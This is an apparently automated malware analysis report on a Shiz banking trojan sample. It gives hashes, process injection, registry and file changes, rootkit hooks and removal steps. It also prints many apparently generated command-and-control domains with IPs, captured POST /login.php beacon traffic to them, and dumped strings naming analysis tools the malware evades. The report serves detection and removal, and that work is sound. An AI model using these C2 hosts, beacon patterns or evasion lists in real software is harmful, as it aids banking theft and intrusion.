Susp_Dropper (Kaspersky), Trojan.Generic.KDV.384775 (B) (Emsisoft), Trojan.Generic.KDV.384775 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, BankerGeneric.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 080493ff49c97d99d2ed9426f88c02d3
SHA1: 85406533b789bae4bb637bbf7c86581f2d1dfad4
SHA256: 6e10fb695c8d74db2df70c575a4fe2ecfdb024becf31abad5955ef05f464ced8
SSDeep: 3072:UiG47vmfhnT1unjf9tLEciSWEqF1R/plSaRCKj8Hn7z89NbgjZrTtM8M8Z1yuxZq:Ui0J4H rRZRxjc74DbgjNTiwr
Size: 261960 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: no certificate found
Created at: 1997-02-06 05:05:23
Analyzed on: WindowsXP SP3 32-bit
Summary: Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
wuauclt.exe:304
%original file name%.exe:496
The Trojan injects its code into the following process(es):
winlogon.exe:708
Explorer.EXE:880
svchost.exe:956
svchost.exe:1020
svchost.exe:1104
svchost.exe:1156
svchost.exe:1200
File activity
The process wuauclt.exe:304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
The Trojan deletes the following file(s):
%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)
The process %original file name%.exe:496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\ukxxgw.exe (1803 bytes)
%System%\config\software (1896 bytes)
%System%\config\SOFTWARE.LOG (2467 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "23 97 4E EF 34 66 E0 C2 5F 5D AF CC 8F 8E CA 1C"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\ukxxgw.exe_, \??\%WinDir%\apppatch\ukxxgw.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöWòk ´µoD¬òd¼Œ¤Kô1,Ã…Â $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€Ã‚Â\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂkDùâ€Âaâ€Â*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÄZ¡r»ôâ€Â)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÃÂ=éÃâ€Ãƒâ€˜Ãƒâ€˜Ã¢â‚¬Â°Ã‚¬q9|áÃÂù’‘ÃÂéšÄRa8a67a25"
Dropped PE files
MD5 | File path |
---|---|
c99625cb1a89836da66571b7ff2cd3cb | c:\WINDOWS\AppPatch\ukxxgw.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in USER32.dll:
GetClipboardData
SetThreadDesktop
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ntdll.dll:
RtlGetNativeSystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
wuauclt.exe:304
%original file name%.exe:496 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
%WinDir%\AppPatch\ukxxgw.exe (1803 bytes)
%System%\config\software (1896 bytes)
%System%\config\SOFTWARE.LOG (2467 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Alexander Roshal
Product Name: Anencephalia
Product Version: 0.7.7.0
Legal Copyright: Hyalonema
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 0.3.3.0
File Description: Strette
Comments:
Language: Language Neutral
Company Name: Alexander RoshalProduct Name: AnencephaliaProduct Version: 0.7.7.0Legal Copyright: HyalonemaLegal Trademarks: Original Filename: Internal Name: File Version: 0.3.3.0File Description: StretteComments: Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.hdxskk | 4096 | 7736 | 8192 | 4.38011 | d791e499c0865ce2b84f80acb7a74b27 |
.X | 12288 | 93574 | 93696 | 5.53997 | 57b9c70c42b44e73cd6de6278467159a |
.FxVsb | 106496 | 280495 | 3072 | 4.61999 | 2fd7b0a976eb9853be36aecaa60aba00 |
.iijo | 389120 | 232050 | 5120 | 4.685 | 4b52df576360d9fcf3badb951b94d8fd |
.peG | 622592 | 44609 | 2560 | 4.26391 | 106979b6a433443a3deb4d754bb2a4a7 |
.szchAv | 667648 | 12288 | 12288 | 4.92493 | 1d481610b0e5624c222e16330a9b3c1d |
.bJPj | 679936 | 60500 | 2560 | 4.37961 | 212c6d0384a8ad3f5e3eb5ef85e409f6 |
.GxsH | 741376 | 40016 | 3072 | 3.4149 | 7678dca9593c5b6053e9383afa758373 |
.ZBQaI | 782336 | 63049 | 2560 | 4.63015 | 7868e0b73dcb83506cf899a4f03b18ff |
.FJZm | 847872 | 92156 | 92160 | 5.54208 | d5f8b503afbbb6e6fdaff4d0279dc428 |
.wRMZfy | 942080 | 241026 | 15872 | 4.96893 | 96d00f6f27f574dd8a79a1b89d532b08 |
.jNEs | 1183744 | 211491 | 3584 | 4.65848 | f0fb063618cfea29bb41a693d70442d1 |
.I | 1396736 | 365637 | 2560 | 4.669 | 44f1544f78b08d251c9a97c1c912ea97 |
.rsrc | 1765376 | 6476 | 6656 | 3.23514 | 026f6a00d4ac5b73963cee20425d9768 |
.reloc | 1773568 | 1536 | 1536 | 3.82878 | c0816a1488ac5d99f955f4ada368b0ef |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://puzylyp.com/login.php | 109.74.196.143 |
hxxp://gatyfus.com/login.php | 86.124.164.25 |
hxxp://vocyzit.com/login.php | 69.195.129.70 |
hxxp://vowydef.com/login.php | 166.78.144.80 |
hxxp://vojyqem.com/login.php | 198.74.50.135 |
hxxp://qetyfuv.com/login.php | 208.73.211.182 |
hxxp://lysynur.com/login.php | 208.73.211.172 |
hxxp://lymysan.com/login.php | 94.126.178.29 |
hxxp://purycap.com/login.php | 193.166.255.171 |
hxxp://gadyfuh.com/login.php | 208.73.211.175 |
hxxp://vofygum.com/login.php | 208.73.211.177 |
hxxp://vonyzuf.com/login.php | 208.73.211.172 |
hxxp://vocyruk.com/login.php | 208.73.211.152 |
qekyqop.com | 166.78.144.80 |
pumyxiv.com | 198.74.50.135 |
puzywel.com | 198.74.50.135 |
gadyniw.com | 109.74.196.143 |
qegyhig.com | 198.74.50.135 |
puvyxil.com | 198.74.50.135 |
qetyvep.com | 109.74.196.143 |
pumypog.com | 198.74.50.135 |
galyqaz.com | 198.74.50.135 |
qeqysag.com | 198.74.50.135 |
lyryfyd.com | 46.242.144.90 |
puvytuq.com | 198.74.50.135 |
lygygin.com | 198.74.50.135 |
volykyc.com | 198.74.50.135 |
www.bing.com | 204.79.197.200 |
lysyfyj.com | 198.74.50.135 |
pufygug.com | 198.74.50.135 |
vofymik.com | |
gahyhob.com | |
qebytiq.com | |
pupybul.com | |
vonypom.com | |
galykes.com | |
pujyjav.com | |
lyvyxor.com | |
lyryvex.com | |
gacyryw.com | |
lykyjad.com | |
qekykev.com | |
gaqycos.com | |
gahyqah.com | |
lymyxid.com | |
qexyryl.com | |
qedynul.com | |
vowycac.com | |
lyvytuj.com | |
lygymoj.com | |
qegyqaq.com | |
gatyvyz.com | |
purydyv.com | |
qexylup.com | |
gacyzuz.com | |
vojyjof.com | |
lyxylux.com | |
qedyfyq.com | |
qeqyxov.com | |
gaqydeb.com | |
pufymoq.com | |
lyxywer.com | |
vopybyt.com | |
ganypih.com | |
volyqat.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatyfus.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Fri, 25 Apr 2014 19:40:46 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4
Connection: close
'OK'..
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadyfuh.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1403
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=92
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.gadyfuh.com; path=/; expires=Sat, 26-Apr-2014 19:40:32 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>gadyfuh.com</title>. <meta name="keywords" content="gadyfuh.com" />. <meta name="description" content="gadyfuh.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://gadyfuh.com?epl=TZKU_-RBzpWfkKEqEOpqfUC6-RgbJBROkdzFL4PrwydU1uuMHPEi5U96PEAmMhsTGaOFA4Mvhh3gSqkOZJQWMDrosgbSW-4HArEo5g5O0yoKM2q8Zc_yo_HzTh6TqkRENRKExTsDoUXIWvhJfkHtBNS65jntzZVPxIlM0k8NjIw0Mpqeap7K1ACgQaapp9E0NBFPEYkAILDe778AAPD_AQAAQIDbDAAA6eZjbFlTJllBMTZoWkKkAAAA8A" name="gadyfuh.com">. </frameset>. <noframes>..<body><a href="http://gadyfuh.com?epl=TZKU_-RBzpWfkKEqEOpqfUC6-RgbJBROkdzFL4PrwydU1uuMHPEi5U96PEAmMhsTGaOFA4Mvhh3gSqkOZJQWMDrosgbSW-4HArEo5g5O0yoKM2q8Zc_yo_HzTh6TqkRENRKExTsDoUXIWvhJfkHtBNS65jntzZVPxIlM0k8NjIw0Mpqeap7K1ACgQaapp9E0NBFPEYkAILDe778AAPD_AQAAQIDbDAAA6eZjbFlTJllBMTZoWkKkAAAA8A">Click here to go to gadyfuh.com</a>.</body>. </noframes&
<<
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vowydef.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Date: Fri, 25 Apr 2014 19:40:32 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Sinkhole: malware-sinkhole
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vofygum.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1399
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=91
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.vofygum.com; path=/; expires=Sat, 26-Apr-2014 19:40:32 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>vofygum.com</title>. <meta name="keywords" content="vofygum.com" />. <meta name="description" content="vofygum.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://vofygum.com?epl=O-jI0lEV_Mt07WS5UKMA9HjDu2mHhMIpkrv4IdaIhKHA4ExKsDXFiURjMDSUEuZVSNqHFQsCQe1Ft-Dy-hkH_dfKg1thfVr8FtuhOVA1zmRDOygiit4z1cE2VdAgkgrr0FJQwmgYQXBhuSX5A4LrORiW6L3JcpI4hKRHA6Ch0dA0ZNLUAGlMPTE1PTXqodFkiqcahAAgsN_vvwAA8P8BAABAgNsMAABveDftWVMmWUExNmhaQqUAAADw" name="vofygum.com">. </frameset>. <noframes>..<body><a href="http://vofygum.com?epl=O-jI0lEV_Mt07WS5UKMA9HjDu2mHhMIpkrv4IdaIhKHA4ExKsDXFiURjMDSUEuZVSNqHFQsCQe1Ft-Dy-hkH_dfKg1thfVr8FtuhOVA1zmRDOygiit4z1cE2VdAgkgrr0FJQwmgYQXBhuSX5A4LrORiW6L3JcpI4hKRHA6Ch0dA0ZNLUAGlMPTE1PTXqodFkiqcahAAgsN_vvwAA8P8BAABAgNsMAABveDftWVMmWUExNmhaQqUAAADw">Click here to go to vofygum.com</a>.</body>. </noframes>.
<<
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyruk.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1399
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=91
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.vocyruk.com; path=/; expires=Sat, 26-Apr-2014 19:40:31 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>vocyruk.com</title>. <meta name="keywords" content="vocyruk.com" />. <meta name="description" content="vocyruk.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://vocyruk.com?epl=eBdMu0VtF35XvhSTiRu2TaBNi3MOCYVTJHfxz3i-VIyJiFWtyTQoIanzRQrHpEH0w4SFcCjBVHInEw-U1_FImslyL3bTpJ-DJeBo5XHqGIjjQGE_Gr49vajm1gAhIoFo5LjgyjZBd5LwO_ODWsfXIGyCt8a6qT0n9QCggeihAfWkqQFSP6ENaaZmmnqqn0hT-6kahAAgsN_vvwAA8P4BAABAgNsMAADatDjnWVMmWUExNmhaQqMAAADw" name="vocyruk.com">. </frameset>. <noframes>..<body><a href="http://vocyruk.com?epl=eBdMu0VtF35XvhSTiRu2TaBNi3MOCYVTJHfxz3i-VIyJiFWtyTQoIanzRQrHpEH0w4SFcCjBVHInEw-U1_FImslyL3bTpJ-DJeBo5XHqGIjjQGE_Gr49vajm1gAhIoFo5LjgyjZBd5LwO_ODWsfXIGyCt8a6qT0n9QCggeihAfWkqQFSP6ENaaZmmnqqn0hT-6kahAAgsN_vvwAA8P4BAABAgNsMAADatDjnWVMmWUExNmhaQqMAAADw">Click here to go to vocyruk.com</a>.</body>. </noframes>.
<<
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vonyzuf.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=94
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.vonyzuf.com; path=/; expires=Sat, 26-Apr-2014 19:40:32 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>vonyzuf.com</title>. <meta name="keywords" content="vonyzuf.com" />. <meta name="description" content="vonyzuf.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://vonyzuf.com?epl=poTms83-WF43IduxJY5aUcByaWkBCYVTJHfxw3-IeelXnAViTGTj1WTzw8obTGStTeZYoykzDxbhevmYdmRSxrlhLAZXqg7lbkAbyHQqMrV2EGi4BF-ST9pUVlEy5bhXhgop3a1E5nReTNRpek0QrJpn_eyyeUqhHhoNylNP8TTpURMZlQBqo2loAOppGk30VEOVACCw3--_AADw_gEAAECA2wwAACyXlhZZUyZZQTE2aFpCowAAAPA" name="vonyzuf.com">. </frameset>. <noframes>..<body><a href="hXXp://vonyzuf.com?epl=poTms83-WF43IduxJY5aUcByaWkBCYVTJHfxw3-IeelXnAViTGTj1WTzw8obTGStTeZYoykzDxbhevmYdmRSxrlhLAZXqg7lbkAbyHQqMrV2EGi4BF-ST9pUVlEy5bhXhgop3a1E5nReTNRpek0QrJpn_eyyeUqhHhoNylNP8TTpURMZlQBqo2loAOppGk30VEOVACCw3--_AADw_gEAAECA2wwAACyXlhZZUyZZQTE2aFpCowAAAPA">Click here to go to vonyzuf.com</a>.</body>. </noframes>.&l
<<
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lymysan.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 25 Apr 2014 19:40:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.15-1~dotdeb.2
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysynur.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1397
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.lysynur.com; path=/; expires=Sat, 26-Apr-2014 19:40:31 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>lysynur.com</title>. <meta name="keywords" content="lysynur.com" />. <meta name="description" content="lysynur.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://lysynur.com?epl=_KXupyIzvKeBG7vkNnCEuyC3LwCChMIpkrv4IR5Sj_wZ9TAmOshZQzGLP8YhIUMRa8BQpoUMA5Qgu6cNVOpposZYU90pTEYUF9aFQV_Jk6Q8Bg9uYjxTKVEQunixTGapgpueOfkBLnJRad0v2Kyh2xOJKrWt9HX-XtQDGkj9KEyjRz0VTA1Qm4aGDBo0MY3aVEOVACCw3u-_AADw_wEAAECA2wwAAOT2BUBZUyZZQTE2aFpCpAAAAPA" name="lysynur.com">. </frameset>. <noframes>..<body><a href="hXXp://lysynur.com?epl=_KXupyIzvKeBG7vkNnCEuyC3LwCChMIpkrv4IR5Sj_wZ9TAmOshZQzGLP8YhIUMRa8BQpoUMA5Qgu6cNVOpposZYU90pTEYUF9aFQV_Jk6Q8Bg9uYjxTKVEQunixTGapgpueOfkBLnJRad0v2Kyh2xOJKrWt9HX-XtQDGkj9KEyjRz0VTA1Qm4aGDBo0MY3aVEOVACCw3u-_AADw_wEAAECA2wwAAOT2BUBZUyZZQTE2aFpCpAAAAPA">Click here to go to lysynur.com</a>.</body>. </noframes>.&l
<<
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetyfuv.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Length: 1405
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=98
P3P: policyref="hXXp://VVV.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: parkinglot=1; domain=.qetyfuv.com; path=/; expires=Sat, 26-Apr-2014 19:40:31 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "hXXp://VVV.w3.org/TR/html4/frameset.dtd">.<!-- turing_cluster_prod -->.<html>. <head>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.. <title>qetyfuv.com</title>. <meta name="keywords" content="qetyfuv.com" />. <meta name="description" content="qetyfuv.com" />. <meta name="robots" content="index, follow" />. <meta name="revisit-after" content="10" />... <meta name="viewport" content="width=device-width, initial-scale=1.0" /> ... . <script type="text/javascript">. document.cookie = "jsc=1";. </script>.. </head>. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">. <frame src="hXXp://qetyfuv.com?epl=Sqzc6YDZUzjsmEEFacIdOph8VoZBQuEUyV3kEvFF_wiHYMTElOCMtOSDlS5OLCTSDpL2wKCA1uOdAqvjpUVv5sG_7Li4xDeN9g7MocJ1sZekiwoJWOm7xWeoUwyWlQBRJhOoNYhH5TwxQYf0KtinJF9LS2nkeqn-vGNEAwAajaaRQXrS1DCKTRNDsamnNvVUPwloUw2FACCw_--_AADw_wEAAECA2wwAACaflWFZUyZZQTE2aFpCpAAAAPA" name="qetyfuv.com">. </frameset>. <noframes>..<body><a href="http://qetyfuv.com?epl=Sqzc6YDZUzjsmEEFacIdOph8VoZBQuEUyV3kEvFF_wiHYMTElOCMtOSDlS5OLCTSDpL2wKCA1uOdAqvjpUVv5sG_7Li4xDeN9g7MocJ1sZekiwoJWOm7xWeoUwyWlQBRJhOoNYhH5TwxQYf0KtinJF9LS2nkeqn-vGNEAwAajaaRQXrS1DCKTRNDsamnNvVUPwloUw2FACCw_--_AADw_wEAAECA2wwAACaflWFZUyZZQTE2aFpCpAAAAPA">Click here to go to qetyfuv.com</a>.</body>. </noframe
<<
<<< skipped >>>
POST /login.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: vocyzit.com
Content-Length: 9
Pragma: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Fri, 25 Apr 2014 19:40:31 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 0
Connection: close
Map
Strings from Dumps
winlogon.exe_708_rwx_01600000_000B4000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
<>http
<>http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
Ý %dh %dm
Ý %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
